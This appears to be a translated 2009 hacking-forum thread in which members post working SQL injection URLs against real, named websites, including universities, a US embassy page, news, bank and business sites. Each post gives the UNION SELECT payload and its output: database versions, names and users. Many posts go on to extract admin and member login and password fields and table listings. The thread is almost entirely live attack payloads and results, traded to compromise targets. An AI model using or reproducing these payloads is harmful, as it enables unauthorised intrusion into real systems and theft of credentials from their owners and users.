4.1.22-standard-log


http://yoga23.ks.ua
http://yoga23.ks.ua/index.php?cat=4+UNION+SELECT+0,concat_ws(0x0b,u ser(),version(),database()),2,3,4+LIMIT+9,3+--+
olvi@localhost
4.0.27-standard-log
olvi_yoga


http://yes.com.ua
http://yes.com.ua/greeting.php?cat=-13'+UNION+SELECT+0,co ncat_Ws(0x0b,us er(),version(),database()),2,3,4,5,6,7+--+
mypresent@127.0.0.1
4.0.27
mypresent_db2


http://apkonline.com.ua
http://apkonline.com.ua/mp/cat_sell.php?cid=-27+UNION+SELECT+0,concat_Ws(0x0b,use r(),version(),database()),2,3,4,5,6,7+--+
apkonlin_mpuser@localhost
4.1.22-standard
apkonlin_marketdb


http://www.temp21.kiev.ua
http://www.temp21.kiev.ua/?chp=obyav&rub=-2+UNION+SELECT+0,1,2,3,4,5,6,7,concat_ws(0x0b,us er(),version(),database()),9,10,11+--+&p=5/
temp21_dbtemp21@viper
4.1.22-log
temp21_temp21


http://www.finmarket.biz
http://www.finmarket.biz/lib/detail.php?cat=1&rub=2&id=-395+UNION+SELECT+0,1,2,3,4,5,6,7,8,9,concat_ws(0x0 b,user(),version(),database()),11,12,13
usmdi@localhost
5.0.27
economics


http://www.kotiko.com.ua
http://www.kotiko.com.ua/art.php?art=-1352+UNION+SELECT+0,1,concat_Ws(0x0b,user(),versio n(),database()),3,4&cat=12
u_stbnwAiN@localhost
4.1.22
stbnwAiN

Rednoise
20.06.2009, 15:56
peterhof.ru

http://www.peterhof.ru/index.php?m=155&subject=-2867+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,concat_ws(0x0b,user(),database(),version()),17 ,18,19,20,21,22,23+--

u23911@78.108.81.211
b23911
5.0.67

InFlame
20.06.2009, 16:02
http://budinak.by/
[PR: 3]

db info:
http://budinak.by/popup-door.php?id=-170+union+select+1,2,3,4,concat_ws(0x3a3a,version( ),database(),user()),6,7,8,9,10,11,12,13
5.0.32-Debian_7etch5-log::budinakby::budinakby@localhost
admin:
http://budinak.by/popup-door.php?id=-170+union+select+1,2,concat_ws(0x3a,login,pass),4, 5,6,7,8,9,10,11,12,13+from+admins

Skofield
20.06.2009, 17:22
http://www.archkku.org

Database Version: 5.0.51a-community
Database name: archkku_archkku
User name: archkku@localhost

users:
http://www.archkku.org/link/template.php?id=-5+union+select+1,group_concat(username,0x3a,user_p assword),3,4,5,6,7+from+archkku_mb.users--

ANUBI$
20.06.2009, 19:24
http://www.bobr.net.ua/articles.php?id=-20+union+select+1,2,3,coNCAT_ws(chAR(42,32,42),use r(),database(),version()),5,6,7
amrita_amrita@s11* *amrita_amrita* *5.1.29-rc-log

ph1l1ster
20.06.2009, 19:32
brasilia.usembassy.gov

http://brasilia.usembassy.gov/index.php?action=recifemateria.php&id=-7914+union+Select+1,2,concat_ws(0x3a,user(),versio n(),database()),4,5,6,7,8,9,0,1,2,3,4--

embusa@localhost
5.1.26-rc
embusa

Gorev
20.06.2009, 20:16
http://www.e-lephant.org/Download.php?ID=685+UNION+SELECT+1,database(),3,4, password,6,7,user(),9,10,name,12,13,14,15,16,id,18 ,19,20,21,22,@@version_compile_os,24,25,26,27,28,2 9,version(),31,32,33,34,35,36,37,38,39,40,41,42,43 ,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,6 0,61,62,63,64+FROM+users+LIMIT+1,1--


Database Version: 5.0.51a-log
Database name: db239698340
User name: dbo239698340@74.208.16.109
Os : redhat-linux-gnu

Rednoise
21.06.2009, 01:33
http://climatecounts.org/scorecardlist.php?c=-13+UNION+SELECT+1,CONCAT_WS(0x3a,Version(),Databas e(),User()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/*

5.0.45:climatecounts:climatecounts@localhost

Rednoise
21.06.2009, 01:37
Attention!!! 10000 - the ten-thousandth post in the thread, heh

http://www.mysilvercrest.de/de/kategorie.php?k=1+UNION+SELECT+1,2,3,4,5,6,7,8,9,1 0,11,12,13,14,15,16,17,CONCAT(0x7873716C696E6A6265 67696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F, User(),0x7873716C696E6A656E64),19,20+LIMIT+1,1/*

Database Version: 4.0.18-log
Database name: dbsilvercrest
User name: heimpel@localhost

beerhack
21.06.2009, 02:02
http://postgraduate.udsm.ac.tz/page.php?id=-1'+union+select+1,2,3,4,version(),6,7/*
Database Version: 5.0.22
Database name: postgraduate
User name: postgraduate@localhost

rolex
21.06.2009, 04:34
http://members.upstateartistsguild.org/member.php?ID=999999+union+select+concat_ws(0x3a,d atabase(),version(),user()),2,3,4,5,6,7,8,9,10,11, 12,13,14,15,16,17,18,19,20,21,22,23--
output in the title
db151943372:4.0.27-max-log:dbo151943372@74.208.16.158
===============================================
PR 5
http://www.vermontfresh.net/member.php?ID=99999+union+select+concat_ws(0x3a,da tabase(),version(),user())--
output in the title
vermontf_vfnDB:4.1.22-standard:vermontf_php@localhost
===============================================
PR 1
http://www.castmodeling.com/jie/Member.php?id=99999999+union+select+concat_ws(0x3a ,database(),version(),user())--
output in the title
wwwdomo_dujie:4.1.22-standard:wwwdomo_dujie@localhost
===============================================
http://dmoose.com/Members/member.php?id=-13420+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,concat_ws(0x3a,database( ),version(),user()),24,25,26,27,28,29,30,31,32,33, 34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49--
dmooseco_alphasigs:4.1.22-standard:dmooseco_dmoose@localhost

HAXTA4OK
21.06.2009, 10:01
http://www.kbsnepal.com.np/article.php?action=view&id=1'+and+substring(version(),1,1)=5+--+

pelligrim
21.06.2009, 11:18
http://www.rokent.com/news.php?id=-66+union+select+1,2,concat_ws(0x3a,version(),datab ase(),user()),4--

4.1.22:rokcorp:foneport@localhost
http://www.spiritgotgame.net/archived_news.php?news_id=-2+union+select+concat_ws(0x3a,version(),database() ,user()),2,3,4,5,6,7,8,9,10,11--
4.0.15-log:spirit_got_game:spiritgotgame@localhost

Gorev
21.06.2009, 11:29
http://fogel.gl.ciw.edu/news.php?newsid=146+and+substring(version(),1,1)=x


Version : 3.23.58

M.W.N.N.
21.06.2009, 12:29
http://www.cali.gov.co/corporativo.php?id=1860%27+union+select+1,2,concat _ws(0x3a,version(),database(),user()),4,5,6,7,8,9, 10,11+limit+1,1/*
version():5.0.26-Max
database():caligovco
user():portal@localhost
__
http://www.rao-ees.edu.ru/index.php?module=dsEnterprises&func=display&catid=2&eid=56+union+select+1,2,3,4,5,concat_ws(0x3a,versi on(),database(),user()),7,8,9,10,11,12,13,14,15,16 ,17,18,19,20,21,22+limit+1,1/*
version():4.0.18-log
database():hr_energo_ru
user():hrenergo@localhost
___
http://www.spsrasd.info/es/detail.php?id=594+union+select+1,2,3,4,5,concat_ws (0x3a,version(),database(),user()),7,8+limit+1,1
version():5.0.58
database():cms
user():spsrasd@localhost
___
http://www.tiemposevero.es/ver-reportaje.php?id=230%27+union+select+1,2,3,4,5,con cat_ws(0x3a,version(),database(),user()),7,8,9,10, 11,12,13+limit+1,1/*
version():5.0.45
database():spainsevereweather
user():tiemposevero@localhost
___
http://www.trailrunning.co.za/events_detail.php?id=179+union+select+1,2,concat_w s(0x3a,version(),database(),user()),4,5,6,7,8,9,10 ,11,12,13,14,15/*
version():5.0.32-Debian_7etch10
database():trailrun_db1
user():trailrun_1@dedi1146.nur4.host-h.net

HAXTA4OK
21.06.2009, 12:31
http://www.canary.edu.np/news_and_notice.php?id=-1'+union+select+1,concat_Ws(0x3a,version(),user(), database()),3,4,5+--+

5.0.77-community:canarye_db@localhost:canarye_db

--StraNger--
21.06.2009, 12:46
http://www.fremontonline.org/menu1.php?id=-1+union+select+1,2,3,concat_ws(0x3a,user,password) +from+mysql.user/*

Skofield
21.06.2009, 16:10
http://www.emersonprint.com.au/news-details.php?ID=-1+union+select+1,version(),3,4,5,6,7,8/*

Database Version: 4.1.21-standard
Database name: emerspr_cms
User name: emerspr_cms@localhost

------------------------------------------------------------------------------------------------------------------------

http://www.ncsa.illinois.edu/AboutUs/People/contact.php?id=-775+union+select+1,version(),3,4,5,6,7,8,9,10--

Database Version: 5.0.67-log
Database name: website
User name: webRead@parrotia.ncsa.uiuc.edu

17 :In database website found table category_list 0 : ID 1 : name 2 : link_name 18 :In database website found table content_list 0 : ID 1 : name 2 : table_name 19 :In database website found table dir_table 0 : ID 1 : parent_dir 2 : name 20 :In database website found table division_content 0 : ID 1 : parent_div 2 : lead 3 : contact 4 : short_desc 5 : long_desc 6 : name 21 :In database website found table file_table 0 : ID 1 : dir_id 2 : file_name 3 : file_type 4 : page_id 22 :In database website found table image_content 0 : ID 1 : name 2 : URL 3 : ALT 23 :In database website found table links_content_table 0 : ID 1 : HREF 2 : title0 3 : title1 4 : title2 24 :In database website found table news_content_table 0 : ID 1 : title 2 : date 3 : release_date 4 : storyLink 5 : short_Blurb 6 : full_Story 7 : contact 8 : location 9 : category 10 : storyType 11 : images 12 : vid_link 25 :In database website found table page_table 0 : ID 1 : name 2 : title 3 : navtype 4 : navBox 5 : related 6 : external 7 : body 8 : style 9 : template 10 : keywords 26 :In database website found table people_content 0 : ID 1 : first_name 2 : last_name 3 : title 4 : email 5 : office 6 : phone 7 : division 8 : description 9 : client_id 27 :In database website found table people_test 0 : ID 1 : first_name 2 : last_name 3 : title 4 : email 5 : office 6 : phone 7 : division 8 : description 9 : client_id 28 :In database website found table project_content 0 : ID 1 : name 2 : group 3 : funding_source 4 : contact 5 : lead 6 : members 7 : partners 8 : short_desc 9 : long_desc 29 :In database website found table pubresearch_content 0 : ID 1 : title 2 : author 3 : link 4 : biblio 5 : category 6 : date 7 : publication_citation 8 : publication_abstract 9 : date_revised 10 : publication_grant 11 : pub_type 30 :In database website found table story_types 0 : name

nothing interesting

DezMond™
21.06.2009, 16:38
http://nuclear-coffee.com/ru/news.php?ID=-35+union+select+1,2,concat_ws(0x3a3a,ID,Link,Name, MainSite,ExampleURL),4+from+websites+--+

http://www.lesducsdangers.fr/news.php?ID=-823+union+select+1,concat_ws(0x3a3a,username,user_ password,user_level),3,4,5,6,7+from+forum_users+li mit+1,1+--+
http://www.lesducsdangers.fr/news.php?ID=-823+union+select+1,concat_ws(0x3a3a,user_type,user name,user_password,user_email),3,4,5,6,7+from+newf orum_users+limit+1,1+--+

http://www.swcrc.com/content.php?id=-43+union+select+1,2,3,4,group_concat(adminuser,cha r(58),adminpass),6,7,8,9,10,11+from+adminsetting+--+

RulleR
21.06.2009, 17:35
[PR 6]
http://www.consulplan.net/noticias/noticia.php?id=-95+union+select+1,2,3,4,unhex(hex(concat_ws(0x3a,v ersion(),database(),user()))),6,7,8,9,10,11
4.1.18-nt-log:consulplan:consulplan_user@localhost
=================
[PR 5]
http://www.semanario.pt/seccao.php?id_seccao=-2+union+select+1,concat_ws(0x3a,version(),database (),user()),3--
4.0.16-standard-log:semanario:semanario@localhost
=================
[PR 4]
http://www.tuk-tuk.com/board/detail.php?id=-77+union+select+1,2,3,4,concat_ws(0x3a,version(),d atabase(),user()),6,7,8,9,10,11,12,13,14,15
5.0.22:tuktuk_web:tuktuk_user2550@localhost
http://www.tuk-tuk.com/board/detail.php?id=-77+union+select+1,2,3,4,5,group_concat(table_name) ,7,8,9,10,11,12,13,14,15+from+information_schema.t ables+where+table_schema!=0x696e666f726d6174696f6e 5f736368656d61+and+table_name%3E0x74756b74756b5f6d 6f645f70616765696e666f
http://www.tuk-tuk.com/board/detail.php?id=-77+union+select+1,2,3,4,5,group_concat(column_name ),7,8,9,10,11,12,13,14,15+from+information_schema. columns+where+table_name=0x74756b74756b5f737973746 56d5f75736572
data from table 'tuktuk_system_user'
http://www.tuk-tuk.com/board/detail.php?id=-77+union+select+1,2,3,4,5,concat_ws(0x3a,tuktuk_sy stem_user_ID,tuktuk_system_user_Name,tuktuk_system _user_Password),7,8,9,10,11,12,13,14,15+from+tuktu k_system_user
=================
[PR 4]
http://www.cenertec.pt/cursos.php?id=-80+union+select+1,2,concat_ws(0x3a,version(),datab ase(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27
5.0.81-community:cenertec_site:cenertec_site@localhost

Skofield
21.06.2009, 18:55
http://www.stevensgroup.org/page.php?id=-13+union+select+group_concat(username,0x3a,passwor d),2,3+from+users/*

Database Version: 4.1.22-standard
Database name: stevensg_msgdb
User name: stevensg_msgdb@localhost

--------------------------------------------------------------------------------------------------------------------------

PR 6

http://www.itr.unisa.edu.au/news/seminardetails.php?id=-549+union+select+1,2,3,4,5,6,7,8/*

Database Version: 5.0.22
User name: apache@dmzserver8.itr.unisa.edu.au

rolex
21.06.2009, 20:04
PR 5
http://www.chapman.com/newsevents.php?&CategoryID=55+union+select+1111,concat_ws(0x3a,dat abase(),version(),user()),3333,4444,5555,6666--
pnc_chapman:4.0.24-log:pnc_chapman@localhost
=====================================
PR 4
http://www.systems.ugent.be/member.php?id=9999999+union+select+1,2,3,4,5,6,7,c oncat_ws(0x3a,database(),version(),user()),9,10,11 ,12,13,14,15,16--
systems:5.0.51a-3ubuntu5.4:systems@webhost.ugent.be
=====================================
PR 4
http://www.irishphotographers.com/member.php?id=99999999+union+select+1,2,3,4,5,6,7, 8,9,10,11,concat_ws(0x3a,database(),version(),user ()),13,14,15,16,17,18,19--
natal_ippa:5.0.45-log:natal_ippa@web11.hosting365.ie

+++AndreyDevil+++
21.06.2009, 21:41
Serbian bank..

http://www.bankmeridian.com/eng/viewnews1.php?section=99&text_id=366+and+substring(version(),1,1)=3/*

oh well

Rubaka
21.06.2009, 21:47
http://www.sewmach.com.ua/cat.php?cat=23&art=-114++union+select+1,2,concat(user_login,0x3a,user_ passw),4,5,6+from+auth_users

Database Version: 5.0.67-log
Database name: sew-mach
User name: sew-mach@localhost

Beauty Line

http://www.beauty-line.com.ua/cat.php?nom=cat&firm=-5+UNION+SELECT+CONCAT(0x7873716C696E6A626567696E,V ersion(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0 x7873716C696E6A656E64),2,3,4

Database Version: 4.1.22
Database name: gezanne
User name: gezanne@localhost

HAXTA4OK
21.06.2009, 22:17
http://www.moe.com.np/terms.php?id=1'+union+select+1,2,3,4,5,6,7,user(), 9,10,11,12,13,14,15+--+

moecom_moe@localhost

ciberx
21.06.2009, 22:22
http://onlinefoto.com.ua/backlinks/links.php?id=3092'

http://onlinefoto.com.ua/backlinks/links.php?id=3092'+union+select+1,2/*

DB
Database Version: 5.0.45-log
Database name: onlinefoto
User name: onlinefoto@localhost

I just can't get anywhere with the tables for some reason...:((

HAXTA4OK
21.06.2009, 22:29
http://onlinefoto.com.ua/backlinks/links.php?id=3092'+UNION+SEL ECT+1,CONCAT(0x7873716C696E6A626567696E,Version(), 0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C 696E6A656E64)+LIMIT+1,1/*

DB
Database Version: 5.0.45-log
Database name: onlinefoto
User name: onlinefoto@localhost

I just can't get anywhere with the tables for some reason...:((


http://onlinefoto.com.ua/backlinks/links.php?id=3092'+union+select+1,group_concat(tab le_name)+from+information_schema.tables+group+by+t able_schema+limit+2,1/*

do it by hand, not with SIPT

--StraNger--
21.06.2009, 22:29
http://www.bintec.ru/?mod=SiteNews&act=7&id=-1+union+select+1,concat_ws(0x3a,login,PASSWORD),3, 4,5,6+from+ssp_AdminSet--+

Gorev
21.06.2009, 23:38
PR 5
http://mahatma.com/php/showNews.php?newsid=67&linkid=16+and+substring(version(),1,1)=x



Version : 5.0.81-community
Database : mahatmam_comdb
User : mahatmam_mahatma@localhost
Os : pc-linux-gnu


and it all works with SIPT too, the main thing is to build the query properly...

http://onlinefoto.com.ua/backlinks/links.php?id=3092'+UNION+SELECT+1,AES_DECRYPT(AES_ ENCRYPT(CONCAT(0x7873716C696E6A626567696E,TABLE_NA ME,0x7873716C696E6A64656C,TABLE_SCHEMA,0x7873716C6 96E6A656E64),0x71),0x71)+FROM+INFORMATION_SCHEMA.T ABLES+LIMIT+45,1/*

16 :In database information_schema found table USER_PRIVILEGES
1 : GRANTEE
2 : TABLE_CATALOG
3 : PRIVILEGE_TYPE
4 : IS_GRANTABLE
17 :In database information_schema found table VIEWS
1 : TABLE_CATALOG
2 : TABLE_SCHEMA
3 : TABLE_NAME
4 : VIEW_DEFINITION
5 : CHECK_OPTION
6 : IS_UPDATABLE
7 : DEFINER
8 : SECURITY_TYPE
18 :In database onlinefoto found table replinks
1 : id
2 : linkdata
19 :In database onlinefoto found table sph_admins
1 : admin_id
2 : login
3 : password
bla bla bla

HAXTA4OK
21.06.2009, 23:45
http://www.nirmaljoshi.com.np/jokes.php?id=-1'+union+select+1,2,3,unhex(hex(concat_ws(0x3a,use r(),database(),version()))),5,6+--+


siddhant123_data@82.197.131.19:siddhant123_data:4. 1.18-log

####################################
http://www.eastern.com.np/news/newsdetail.php?id=-1+union+select+1,2,version(),4,5,6,7--

5.0.77-community


admin:

http://www.eastern.com.np/news/newsdetail.php?id=-1+union+select+1,2,group_concat(column_name),4,5,6 ,7+from+information_schema.columns+where+table_nam e=0x75736572--

Skofield
22.06.2009, 01:25
http://www.russellmania.com/index.php?id=35&dvd_id=-1137+union+select+version()--

Database Version: 5.0.77-community
Database name: mania_cms
User name: mania_user@localhost

M.W.N.N.
22.06.2009, 01:30
http://www.milnerton.co.za/details.php?id=2965++union+select+1,2,3,4,5,6,7,8, 9,10,11,12,13,concat_ws(0x3a,version(),database(), user()),15,16,17,18,19,20,21,22,23,24,25,26,27,28, 29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45 ,46,47,48,49,50,51,52,53,54,55,56,57,58+limit+1,1/*
version():5.0.38-Debian_2-log
database():milnertondb
user():34_milnertondb@localhost

There is a table prop_admin
__
http://www.rvtech.co.za/NewsView.php?Id=1+union+select+1,2,concat_ws(0x3a, version(),database(),user()),4,5+limit+1,1/*
version():5.0.32-Debian_7etch10
database():rvtech_db1
user():rvtech_1@dedi185.nur4.host-h.net

There is a table User

DezMond™
22.06.2009, 15:59
http://www.clownage.fr/paroles.php?id=-9+union+select+1,group_concat(column_name),3,4+fro m+information_schema.columns+where+table_name=0x63 6C5F6E657773+/*+

http://www.sko-meteo.kz/view_date.php?date=2008-03'+UnIoN+SeLecT+1,table_name,3,4,5,6,7,8+from+inf ormation_schema.tables+--+

http://www.granjard.fr/ameublement.php?id=-13+union+select+1,2,3,4,5,concat_ws(0x3a3a,login,p assword),7+from+user+/*+

http://psr-quad.com/fiche_produit.php?proid=-520+UnIon+SeLect+1,2,3,4,5,concat_ws(0x3a3a,login, password),7,8,9,10,11,12,13,14+from+user+--+

PS Where are the admin panels here ???

rolex
22.06.2009, 18:06
PR 4
http://www.suwalki.info/comment.php?what=news&id=6492+union+select+1,2,3,4,5,6,7,concat_ws(0x3a, database(),version(),user()),9--
suwalki_glowna:4.1.22-standard:suwalki_glowna@localhost

users:
http://www.suwalki.info/comment.php?what=news&id=6492+union+select+1,2,3,4,5,6,7,concat_ws(0x3a, mail,nick,pass),9+from+users--
admins:
http://www.suwalki.info/comment.php?what=news&id=6492+union+select+1,2,3,4,5,6,7,concat_ws(0x3a, mail,nick,pass),9+from+admins--
===============================================
PR 4
http://www.thecancer.net/category.php?id=-42+union+select+1,concat_ws(0x3a,database(),versio n(),user()),3--
d60237022:5.0.77-log:u70254108@cgihost
===============================================
PR 3
http://www.nigelwhitfield.com/v2/article.php?id=-1+union+select+1,2,3,aes_decrypt(aes_encrypt(conca t(database(),0x3a,version(),0x3a,user()),1),1),5,6 ,7--
nwcomContent:4.1.16:nwcom@localhost

Skofield
22.06.2009, 19:42
http://www.suffolksharks.com/game.php?id=-13+union+select+memberlogin,memberpassword+from+Me mbers--

Database Version: 5.0.67.d7-ourdelta-log
Database name: suffolksharks
User name: suffolksharks@72.167.183.54

----------------------------------------------------------------------------------------------------

http://www.mblturismo.com.br/lermateria.php?id=-3+union+select+1,version(),3,4,5,6--

Database Version: 5.0.77-community
Database name: mblturi_dbmbl
User name: mblturi_daniel@localhost

----------------------------------------------------------------------------------------------------

PR 6
http://www.unf.edu/development/news/pressreleases/releaseview.php?id=-586+union+select+1,2,version(),4/*

Database Version: 4.1.22
Database name: news
User name: newsuser@localhost

HAXTA4OK
22.06.2009, 23:14
http://nnv.nepalnews.com.np/videoplay1.php?id=-1+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3,4,5,6--

4.1.22-standard:nnvdo_nnvdodb@localhost:nnvdo_nnv


########################################

http://www.jiou-li.com.tw/modules/shop/shop_view.php?id=1&pid=215+and+substring(version(),1,1)=5--

Skofield
22.06.2009, 23:17
http://www.sweatclubs.com/partner-physicians.php?id=-3+union+select+1,2,3,4,concat_ws(0x3a,vchUserName, vchUserPassword),6+from+BIM_UserMaster--

Database Version: 5.0.83-log
Database name: sweat
User name: cpt12345@localhost

PaCo
23.06.2009, 09:17
moemesto.ru pr-7 TIC 2700

http://moemesto.ru/tags/%E4%EE%EC'%0bunion%0bselect%0bversion()--%0b/

5.0.45-log

Unfortunately the length of the value inserted through the human-readable URL is limited (maybe a regex in .htaccess is cutting it), so from etc. won't fit anymore...

Pashkela
23.06.2009, 14:36
http://sms-fun.org/viewjokes.php?id=2652+and+substring(version(),1,1) =5

http://www.india6666.com/jokes/viewjokes-114+and+substring(version(),1,1)=5--+.html

http://kannadahanigalu.com/viewjokes.php?jokes=252&id=3592+and+substring(version(),1,1)=5

http://www.coolstuffs.in/jokes/jokescript/tamil_jokes/viewjokes.php?7325&id=3463+and+substring(version(),1,1)=5

InFlame
23.06.2009, 14:50
http://www.kryshavel.by/photos.php?fotosectionid=-2+union+select+1,2,3,4,concat_ws(0x0b,version(),us er(),database()),6/*&kind=Rocky

5.0.32-Debian_7etch5-log
kryshavelby@localhost
kryshavelby


Tables:
http://www.kryshavel.by/photos.php?fotosectionid=-2+union+select+1,2,3,4,group_concat(0x0b,table_nam e),6+from+information_schema.tables+group+by+table _schema+limit+1,1/*&kind=Rocky
items,
docs,
security,
materialgroup,
faqs,
dillermessages,
statistic,
news,
fotos,
dillerprices,
params,
fotosections,
dillers,
prices

AlexSatter
23.06.2009, 14:53
I don't know whether this is a repost or not, the anti-repost checker is down right now...

http://bla-bla-bla.ru/zags/brak.php?id=-920+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,concat_ws(0x3a,version(),user(), database()),22,23
5.0.45:user_blablablaru@localhost:bla-bla-bla_ru

rolex
23.06.2009, 17:04
PR 4
http://www.agoraquest.com/article.php?sid=99999999+union+select+1,2,3,4,5,co ncat_ws(0x3a,database(),version(),user()),7,8,9--
PR 3
http://www.marlowconnell.com/member.php?ID=9999+union+select+1,concat_ws(0x3a,d atabase(),version(),user()),3,4,5,6,7,8,9--
PR 2
http://www.ktimalaniti.com/article.php/section.php?id=99999+union+select+concat_ws(0x3a,d atabase(),version(),user()),2--
--------------------------------------
http://www.ppabc.com/member.php?id=999999+union+select+1,2,concat_ws(0x 3a,database(),version(),user()),4,5--
http://en.ludeales.com/member.php?id=9999999+union+select+concat_ws(0x3a, database(),version(),user()),2,3,4--
http://www.medic.org.ru/library/cat/sex.php?id=-1+union+selecT+1,2,3,concat_ws(0x3a,database(),ver sion(),user()),5,6,7,8,9,10,11--
http://mebelinfo.biz/article.php?id=99999+union+select+1,2,concat_ws(0x 3a,database(),version(),user()),4,5,6--